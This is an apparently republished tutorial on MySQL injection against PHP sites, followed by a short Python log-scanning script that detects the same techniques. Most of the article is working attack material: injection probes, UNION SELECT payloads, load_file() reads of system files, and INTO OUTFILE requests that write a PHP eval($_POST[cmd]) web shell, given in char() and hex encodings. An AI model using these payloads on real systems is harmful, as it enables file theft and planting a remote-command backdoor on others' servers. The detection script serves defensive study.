MySQL Injection Techniques: Detecting Vulnerabilities, Determining Field Count, Using UNION SELECT, and Exploiting load_file()

This article explains how to identify MySQL injection points, determine the number of columns with ORDER BY, enumerate fields via UNION SELECT, leverage common MySQL functions, and exploit the load_file() function—including char() encoding, replace, substring, and INTO OUTFILE—to read or write files on the target system.

Laravel Tech Community

Detecting Injection: Append "and 1=1" and then "and 1=2" to a URL parameter; differing responses indicate a possible injection point.

Determining Column Count: Use order by N incrementally (e.g., http://127.0.0.1/1.php?id=1 order by 40) until an error occurs; the last successful number reveals the column count.

Enumerating Fields with UNION SELECT: Once the column count is known, craft a UNION SELECT payload that lists dummy values for each column (e.g., union select 1,2,3,4~44) to confirm the injection works.

Common MySQL Functions: Functions such as system_user(), user(), current_user(), session_user(), database(), version(), and load_file() provide valuable information about the target system.

Using load_file() to Read Files: If the database account behind the injection point has file read/write privileges, load_file() can read local files. Verify permission with "and (select count(*) from mysql.user)>0". Example for Windows paths using char() encoding:

load_file(char(99,58,47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105))

reads c:/windows/php.ini. Similar examples are provided for Linux/UNIX and FreeBSD.

Bypassing Output Filtering: Replace problematic characters in the file content using replace(load_file(A),char(B),char(C)), e.g., replace(load_file(A),char(60),char(32)) to turn '<' into a space.

Partial Output with substring(): Use substring(load_file(A),50,100) to retrieve a specific segment of a large file.

Writing Files with INTO OUTFILE: Conditions required: known physical path, UNION support (MySQL 3+), no filtering of quotes, file_priv privilege, and write permission on the web directory. Example payload to write a web shell:

http://www.xxx.com/coder.php?id=1 and 1=2 union select 1,load_file('/www/home/html/upload/qingyafengping.jpg'),3,4,5,6 into outfile '/www/home/html/coder.php'

Alternative Payloads: When file upload is blocked, encode the web shell directly with char() or hexadecimal and write it via INTO OUTFILE, e.g.,

http://www.xxx.com/coder.php?id=1 and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile '/www/home/html/coder.php'

or using hex: 0x3C3F706870206576616C28245F504F53545B636D645D293F3E.

Conclusion: The techniques described apply to older PHP versions (≤5.6); newer versions have mitigations, but understanding these methods remains essential for security testing and defensive hardening.
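
For the defensive side mentioned in the conclusion, the following sketch (an added example, not part of the original article) scans web-server request lines for the constructs described above. It first undoes URL encoding and decodes char() and 0x literals so that an encoded file path becomes visible to the rules. The function names, rule labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# char(99,58,...) and 0x... literals hide strings from plain keyword matching.
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)

# Constructs named in the article, each mapped to a finding label.
RULES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write", re.compile(r"\binto\s+outfile\b", re.I)),
]

def decode_literals(sql):
    """Replace char(...) and 0x... literals with the quoted text they encode."""
    def from_char(match):
        codes = [int(n) for n in match.group(1).split(",")]
        if max(codes) > 255:
            return match.group(0)  # not a byte string, leave untouched
        return "'" + bytes(codes).decode("latin-1") + "'"

    def from_hex(match):
        return "'" + bytes.fromhex(match.group(1)).decode("latin-1") + "'"

    return HEX_LITERAL.sub(from_hex, CHAR_CALL.sub(from_char, sql))

def inspect_request(request_line):
    """Return (sorted finding labels, decoded request line)."""
    decoded = decode_literals(unquote_plus(request_line))
    return sorted(label for label, rx in RULES if rx.search(decoded)), decoded

# Constructed access-log request lines built from the article's own examples.
SAMPLE_LOG = [
    "GET /1.php?id=1 HTTP/1.1",
    "GET /1.php?id=1%20order%20by%2040 HTTP/1.1",
    "GET /1.php?id=1+and+1=2+union+select+1,load_file(char(99,58,47,119,105,"
    "110,100,111,119,115,47,112,104,112,46,105,110,105)),3 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        findings, decoded = inspect_request(line)
        if findings:
            print(findings, "->", decoded)
```

Keyword rules like these are a triage aid for logs, not a substitute for parameterized queries and a database account without the FILE privilege.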

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
